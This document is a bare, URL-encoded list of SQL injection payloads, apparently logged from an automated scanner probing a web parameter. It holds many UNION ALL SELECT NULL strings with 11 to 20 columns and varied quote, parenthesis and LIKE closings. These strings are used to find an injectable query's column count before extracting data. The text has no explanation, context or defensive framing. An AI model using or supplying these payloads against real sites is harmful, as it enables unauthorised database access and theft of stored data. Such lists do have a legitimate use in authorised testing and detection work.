1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289325%3D9325 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287645%3D7645 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289294%3D9294 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283486%3D3486 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283525%3D3525 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%288429%3D8429 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289255%3D9255 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289390%3D9390 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%284212%3D4212 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283157%3D3157 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288101%3D8101 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%289985%3D9985 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284072%3D4072 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283146%3D3146 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288865%3D8865 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%285498%3D5498 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284539%3D4539 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287384%3D7384 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%282482%3D2482 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%281264%3D1264 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%286779%3D6779 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%281778%3D1778 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%288852%3D8852 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%289747%3D9747 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%289944%3D9944 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287556%3D7556 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%283822%3D3822 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%289599%3D9599 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%283665%3D3665 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%286354%3D6354 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27aHUz%27%3D%27aHUz 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27SrOG%27%3D%27SrOG 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ryvo%27%3D%27ryvo 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27QiZm%27%3D%27QiZm 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27oHWi%27%3D%27oHWi 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27HyyI%27%3D%27HyyI 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27pWOu%27%3D%27pWOu 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27iMCx%27%3D%27iMCx 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27MqZI%27%3D%27MqZI 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Xnwv%27%3D%27Xnwv 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27qVFn%27%3D%27qVFn 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27KsIR%27%3D%27KsIR 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27KFCG%27%3D%27KFCG 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27oZut%27%3D%27oZut 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27GPrN%27%3D%27GPrN 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27BuuB%27%3D%27BuuB 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27rwRh%27%3D%27rwRh 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27COme%27%3D%27COme 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27mCso%27%3D%27mCso 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27bKYV%27%3D%27bKYV 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27rStv%27%3D%27rStv 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27HUxO%27%3D%27HUxO 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27ZEaN%27%3D%27ZEaN 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27AQqe%27%3D%27AQqe 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27TTyU%27%3D%27TTyU 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27wstb%27%3D%27wstb 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27iqnG%27%3D%27iqnG 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27CkEz%27%3D%27CkEz 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27Bbvb%27%3D%27Bbvb 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27RdpV%27%3D%27RdpV 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27tPix%27%3D%27tPix 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27gJNh%27%3D%27gJNh 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27bACK%27%3D%27bACK 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27WRHi%27%3D%27WRHi 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27IwxU%27%3D%27IwxU 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27wAri%27%3D%27wAri 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27xIEy%27%3D%27xIEy 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27sAdU%27%3D%27sAdU 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27mYwP%27%3D%27mYwP 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27lGFg%27%3D%27lGFg 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27mzAh%27%20LIKE%20%27mzAh 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27oIGQ%27%20LIKE%20%27oIGQ 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27RobY%27%20LIKE%20%27RobY 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27sUnH%27%20LIKE%20%27sUnH 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Klxj%27%20LIKE%20%27Klxj 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27mXUZ%27%20LIKE%20%27mXUZ 